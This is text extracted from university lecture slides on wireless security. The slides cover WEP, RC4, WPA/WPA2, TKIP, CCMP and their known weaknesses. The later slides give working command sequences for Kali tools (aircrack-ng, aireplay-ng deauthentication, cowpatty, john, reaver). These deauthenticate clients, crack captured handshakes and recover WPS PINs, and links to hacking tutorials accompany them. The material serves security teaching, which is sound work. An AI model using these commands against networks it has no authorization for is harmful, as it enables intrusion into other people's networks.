Wireless Security Comp Sci 3600 Security
Outline 1 2 3
Wired versus wireless Endpoint Access point Figure 24.1 Wireless Networking Components
Locations and types of attack
Outline 1 2 3
Wired Equivalent Privacy () Security algorithm for IEEE 802.11 wireless networks Part of the original 802.11 standard ratified in 1997 is recognizable by its key of 10 or 26 hexadecimal digits (40 or 104 bits), and was at one time widely in use and was often the first security choice presented to users by router configuration tools. C: encrypted I: data integrity check A: passphase authentication
Outline 1 2 3
authentication
authentication 1 A wireless host requests authentication by an access point. 2 The access point responds to the authentication request with a 128-byte nonce value. 3 The wireless host encrypts the nonce using the symmetric key that it shares with the access point. 4 The access point decrypts the host-encrypted nonce.
Outline 1 2 3
RC4
RC4
RC4 encryption
RC4 decryption
RC4 summary 1 First a 4-byte cyclic redundancy check value is computed for the data payload. 2 Key value (in this case, the 64-bit (K S, IV) key), 40 bits shared, IV is 24 bits 3 RC4 algorithm produces a stream of key values, k1 IV, kiv 2, kiv 3,... that are used to encrypt the data and CRC value in a frame.
and Decryption is performed by XOR-ing the ith byte of data, d i, with the ith key, ki IV, in the stream of key values generated by the (K S, IV ) pair to produce the ith byte of ciphertext, c i : c i = d i k IV i The IV value changes from one frame to the next and is included in plaintext in the header of each -encrypted 802.11 frame (previous slide) The receiver takes the secret 40-bit symmetric key that it shares with the sender, appends the IV, and uses the resulting 64-bit key (which is identical to the key used by the sender to perform encryption) to decrypt the frame: d i = c i k IV i
Outline 1 2 3
Flaw 1: keystream re-use Proper use of the RC4 algorithm requires that the same 64-bit key value never be used more than once. Recall that the key changes on a frame-by-frame basis. For a given K S (which changes rarely, if ever), this means that there are only 2 24 unique keys. If these keys are chosen randomly, the probability of having chosen the same IV value (and hence used the same 64-bit key) is more than 99 percent after only 12,000 frames. With 1 Kbyte frame sizes and a data transmission rate of 11 Mbps, only a few seconds are needed before 12,000 frames are transmitted. Since the IV is transmitted in plaintext in the frame, an eavesdropper will know whenever a duplicate IV value is used. Two frames that use the same IV likely use the same secret key and thus keystream
More flaws Cyclic redundancy check is not cryptographically secure: an attacker who changes the encrypted content (e.g., substituting gibberish for the original encrypted data), computes a CRC over the substituted gibberish, and places the CRC into a frame can produce an 802.11 frame that will be accepted by the receiver. Weak keys are often chosen PRNG bad too
https://en.wikipedia.org/wiki/aircrack-ng Let s check out a practical attack using our Kali VMs https: //kalitutorials.wordpress.com/2014/07/10/wifi-hack-crack-wep-passwords-with-kali/ http://www.wirelesshack.org/ step-by-step-kali-linux-and-wireless-hacking-basics-wep-hacking-part-3.html https://www.hackingloops.com/crack-wep-wifi-using-kali-linux/ https://teachmehacking.com/aircrack-ng-hack-wifi/ http://ultimatepeter.com/hacking-wifi-cracking-wep-with-kali-linux/ https: //lifehacker.com/5305094/how-to-crack-a-wi-fi-networks-wep-password-with-backtrack
Outline 1 2 3
WPA and WPA2 WPA (sometimes referred to as the draft IEEE 802.11i standard) became available in 2003. The Wi-Fi Alliance intended it as an intermediate measure in anticipation of the availability of the more secure and complex WPA2, which became available in 2004 and is a common shorthand for the full IEEE 802.11i (or IEEE 802.11i-2004) standard.
Outline 1 2 3
1 WPA-personal: Also referred to as WPA-PSK (pre-shared key) mode, this is designed for home and small office networks and doesn t require an authentication server 2 WPA-enterprise: Also referred to as WPA-802.1X mode, and sometimes just WPA (as opposed to WPA-PSK), this is designed for enterprise networks and requires a RADIUS authentication server. This requires a more complicated setup, but provides additional security (e.g. protection against dictionary attacks on short passwords). 3 Wi-Fi protected Setup (): This is an alternative authentication key distribution method intended to simplify and en the process, but which, as widely implemented, creates a major security hole via PIN recovery.
After the PSK or 802.1X authentication, a shared secret key is generated, called the Pairwise Master Key (PMK). The PMK is derived from a password that is put through PBKDF2-SHA1 as the cryptographic hash function. In a pre-shared-key network, the PMK is actually the PSK. If an 802.1X EAP exchange was carried out, the PMK is derived from the EAP parameters provided by the authentication server.
(PSK mode)
(PSK mode)
(PSK mode)
Outline 1 2 3
TKIP (Temporal Key Integrity Protocol): The RC4 stream cipher is used with a 128-bit per-packet key, meaning that it dynamically generates a new key for each packet. This is used by WPA. CCMP (CTR mode with CBC-MAC Protocol): The protocol used by WPA2, based on the Advanced Standard (AES) cipher along with strong message authenticity and integrity checking is significantly stronger in protection for both privacy and integrity than the RC4-based TKIP that is used by WPA. Informal names are AES and AES-CCMP
AES: CTR mode (nonce is IV here)
CBC-MAC To calculate the CBC-MAC of message m one encrypts m in CBC mode with zero initialization vector. Blocks m 1 m 2... m x using a secret key k and a block cipher E:
Outline 1 2 3
These come in two main categories 1 Exploits on proper function which has been mis-managed by the user Weak password 2 Actual flaws/bugs to be exploited WPA packet spoofing and decryption pin recovery MS-CHAPv2 design weakness Shared Group Temporal Key (GTK) flaw (hole196) Lack of forward secrecy (e.g., no use of DH) Predictable Group Temporal Key (GTK) KRACK attack (a replay attack)
Attack on weak passwords 1 Kick someone off their network 2 Capture the traffic when they perform their 4-way handshake, which contains a hash of the password 3 Crack the password offline using a dictionary, rainbow table, or brute force https://geekviews.tech/aircrack-ng-tutorial/ https://null-byte.wonderhowto.com/how-to/ hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/
Attack on weak passwords Setup and choose network airmon-ng start wlan0 # put wlan0 in monitor mode airodump-ng wlan0mon # check out networks Capture traffic on network of interest airodump-ng -c 11 bssid 00:07:26:47:B0:35 -w capfile wlan0mon # capture traffic Deauthenticate (kick off) these are ALTERNATIVES aireplay-ng deauth 4 -a 00:07:26:47:B0:35 wlan0mon mdk3 wlan0mon d -b 00:07:26:47:B0:35 -c 4 aireplay-ng ignore-negative-one -0 10 -a AP MAC -c Client MAC wlan0mon Crack capfile offline these are ALTERNATIVES aircrack-ng -b 00:07:26:47:B0:35 capfile.cap -w /usr/share/john/password.lst #dictionary cowpatty -r acm dictionary-01.cap d dictionary hash s dictionary #rainbow-table john -stdout -incremental:all aircrack-ng -b 00:1a:c4:51:3c:31 -w acm dictionary-01.cap #brute force
Wifi Protected Setup Created by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to allow home users who know little of wireless security and may be intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. When an enrollee attempts to gain access using a PIN, the registrar reports the validity of the first and second halves of the PIN separately. Since the first half of the pin consists of four digits (10,000 possibilities) and the second half has only three active digits (1000 possibilities), at most 11,000 guesses are needed before the PIN is recovered.
Wifi Protected Setup attack software Reaver (online/realtime attack) https://code.google.com/archive/p/reaver-wps/wikis/readme.wiki Bully (online/realtime attack) https://null-byte.wonderhowto.com/how-to/ hack-wi-fi-breaking-wps-pin-get-password-with-bully-0158819/ https://tools.kali.org/wireless-attacks/bully Pixie (offline attack specific to some vendors) in combination with Reaver or Bully https://github.com/wiire-a/pixiewps
Wifi Protected Setup: Reaver steps ifconfig # see your interface name airmon-ng start wlan0 # or your interface name airodum-ng wlan0mon # to see networks wash -i wlan0mon # to see networks only reaver -i wlan0mon bssid 00:01:02:03:04:05 # the good stuff # If you get rate-limited, there are many further options # You can also change your MAC first, but it needs to be specified in Reaver execution as a flag